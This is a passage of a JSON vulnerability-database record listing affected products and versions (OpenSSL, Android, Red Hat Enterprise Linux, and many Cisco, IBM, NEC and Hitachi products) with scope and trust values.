"scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.1" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.0.1" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2a" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.4.3" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.3" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.0.2" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "1.0.1n" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.1.2" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.3.1" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "5.1.0" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "6.0.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "5.0" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.0.4" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.2" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.4" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "5.0.1" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "6.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.0.3" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.2.1" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.4.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2b" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.2.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "5.1" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "android", "scope": "eq", "trust": 1.0, "vendor": "google", "version": "4.0" }, { "model": "esmpro/serveragentservice", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all versions (linux)" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7)" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7)" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 6)" }, { "model": "ucosminexus developer standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "enterprise linux hpc node eus", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7.2)" }, { "model": "android", "scope": null, "trust": 0.8, "vendor": "google", "version": null }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series univerge sg3000lg/lj" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v6.2" }, { "model": "cosminexus developer version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7)" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v7.1" }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base version 6" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7.2)" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.2" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "7.0" }, { "model": "hpe helion openstack", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "2.1" }, { "model": "cosminexus developer standard version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional for plug-in" }, { "model": "web server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- messaging" }, { "model": "ip38x/3000", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "cosminexus application server version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ip38x/1200", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.1o" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "st ard v8.2 to v9.4" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.1" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "netvisorpro 6.1" }, { "model": "ip38x/810", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "webotx enterprise service bus", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.3" }, { "model": "ip38x/n500", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ucosminexus developer light", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series sg3600lm/lg/lj v6.1" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 6)" }, { "model": "cosminexus developer light version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "st ard-r" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 6)" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "capssuite", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0 to v4.0" }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "business connect v7.1.1" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v4.0" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.11 and later" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7.2)" }, { "model": "ip38x/sr100", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "hpe helion openstack", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "2.1.2" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 6)" }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.0" }, { "model": "hpe helion openstack", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "2.0" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "6.2" }, { "model": "enterprisedirectoryserver", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver6.1 to v8.0" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.2" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v7.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series intersecvm/sg v1.2" }, { "model": "ip38x/1210", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.4" }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7)" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "express" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.4" }, { "model": "web server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- security enhancement" }, { "model": "hpe helion openstack", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "2.1.4" }, { "model": "ip38x/3500", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ip38x/fw120", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "01" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.2c" }, { "model": "ip38x/5000", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ucosminexus application server standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2" }, { "model": "ucosminexus application server smart edition", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "registered envelope service", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "paging server", "scope": "ne", "trust": 0.6, "vendor": "cisco", "version": "11.5.1" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.6, "vendor": "cisco", "version": "1000v" }, { "model": "network performance analytics", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "ironport encryption appliance", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "spa51x series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mate collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "security network controller 1.0.3361m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4.1" }, { "model": "network health framework", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa232d multi-line dect ata", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(1)" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.2.1" }, { "model": "unified series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "780011.5.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "purview", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(3.10000.9)" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.6(3)" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.3" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "87104.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.40" }, { "model": "emergency responder", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.2" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.2" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.6.0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "protectier entry edition ts7610 ts7620", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-/2.4" }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "xenserver service pack", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "6.21" }, { "model": "nexus series blade switches 0.9.8zf", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "protectier gateway for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "telepresence isdn link", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "telepresence sx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5.1.6" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.51" }, { "model": "helion openstack", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "85100" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5.1.131" }, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.2" }, { "model": "mediasense 9.0", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "abyp-4tl-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "cognos business intelligence interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.119" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "protectier appliance edition ts7650ap1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-3.1" }, { "model": "helion openstack", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.0.0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.8" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.2" }, { "model": "prime collaboration assurance sp1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1)" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.16" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "intelligent automation for cloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.4" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3361" }, { "model": "unified ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "prime security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.5.4.3" }, { "model": "protectier appliance edition ts7650ap1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-3.4" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.13-34" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "16.1" }, { "model": "im and presence service", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "ata analog telephone adaptor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1879.2.5" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs central 1.5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5(2)" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "prime collaboration deployment", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "series ip phones vpn feature", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8800-11.5.2" }, { "model": "mobile foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.1" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3394" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.2" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "protectier enterprise edition ts7650g", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-3.3" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.14.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere application server ~~liberty", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.3-" }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "protectier gateway for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "webex recording playback client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.2" }, { "model": "sterling connect:direct for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90008.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.16-37" }, { "model": "nexus series switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "opensuse evergreen", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11.4" }, { "model": "prime infrastructure standalone plug and play gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "identifi wireless", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "10.11" }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa50x series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1o", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "media experience engines", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.5.1" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.4" }, { "model": "telepresence integrator c series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5" }, { "model": "anyconnect secure mobility client", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.1" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87100" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.1" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4-23" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.25-57" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.14.0" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.18-43" }, { "model": "helion openstack", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2" }, { "model": "cloud manager with openstack interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "workload deployer if12", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.7" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus intercloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "media experience engines", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.5" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "16.1.3" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.1" }, { "model": "ips", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70000" }, { "model": "unified workforce optimization quality management sr3 es5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.0" }, { "model": "qradar", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "meetingplace", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.7" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.1" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "protectier entry edition ts7610 ts7620", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-/3.1" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "xenserver common criteria", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "6.0.2" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime access registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.0.1.7" }, { "model": "webex messenger service ep1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.9.9" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.3" }, { "model": "mediasense", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8961" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1.1" }, { "model": "unified wireless ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": 